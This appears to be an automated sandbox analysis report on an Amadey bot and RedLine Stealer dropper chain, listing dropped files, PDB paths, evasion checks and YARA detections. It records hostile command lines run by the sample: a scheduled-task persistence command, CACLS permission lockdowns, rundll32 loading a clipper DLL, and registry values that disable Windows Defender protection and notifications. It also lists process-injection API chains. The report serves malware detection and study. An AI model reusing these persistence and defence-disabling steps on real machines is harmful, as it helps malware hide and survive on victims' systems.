Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.250463432.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 0000000B.00000003.316310103.0000000001682000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000000.315748298.000000000138E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 0000000C.00000002.775000934.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000C.00000000.318162039.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000000.329735996.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000002.332650893.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000000.352215568.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000002.352736386.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000000.478701407.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000002.479552852.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000002.607657638.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000000.607327719.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000000.735938171.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000002.736512930.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.11.dr, xriv.exe.0.dr
Source:	Binary string: Healer.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: file.exe, bfCg.exe.0.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000006.00000000.290177703.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
Source:	Binary string: _.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\wevepipes\ho.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000000.250999613.0000000000401000.00000020.00000001.01000000.00000005.sdmp, afCf.exe.1.dr
Source:	Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: rundll32.exe, 00000016.00000002.775107488.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, clip64[1].dll.12.dr, clip64.dll.12.dr
Source:	Binary string: Healer.pdbH5 source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Unpacked PE file: 2.2.afCf.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Unpacked PE file: 2.2.afCf.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB724D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_0094724D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0041C40C push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00423149 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0041C50E push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_004231C8 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0040E21D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0041C6BE push ebx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0067C125 push ebx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066E484 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0067BE73 push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0067BF75 push cs; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0085C693 push edi; retf
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00859748 push FFFFFFE1h; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_01377D26 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0136F748 push E8FFFFFBh; iretd

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,

Source: nika.exe.1.dr

Static PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	File created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00941AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe TID: 3804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 3868	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332	Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332	Thread sleep time: -1920000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6028	Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6044	Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6044	Thread sleep time: -9360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5992	Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4840	Thread sleep count: 189 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4840	Thread sleep time: -189000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\file.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

API coverage: 6.9 %

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 50000
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

API call chain: ExitProcess graph end node

Source: xriv.exe, 0000000B.00000002.318710664.0000000001688000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00942390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0137FC58 FindFirstFileExW,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Source: C:\Users\user\Desktop\file.exe

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00660D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00857C33 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0137A9A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0137CFB2 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Code function: 2_2_0040ADB0 GetProcessHeap,HeapFree,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB6F40 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00946F40 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00946CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066D070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066E883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006771D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00672658 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_01377A74 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0137790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0137BB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_01377208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 11_2_013638C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB17EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: GetLocaleInfoA,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 11_2_01377AFC cpuid

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB7176 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 11_2_01383C76 _free,_free,_free,GetTimeZoneInformation,_free,

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Code function: 6_2_00007FFC9D7D077D GetUserNameA,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1

Jump to behavior

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 2.2.afCf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.afCf.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.afCf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.afCf.exe.660e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.262775984.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

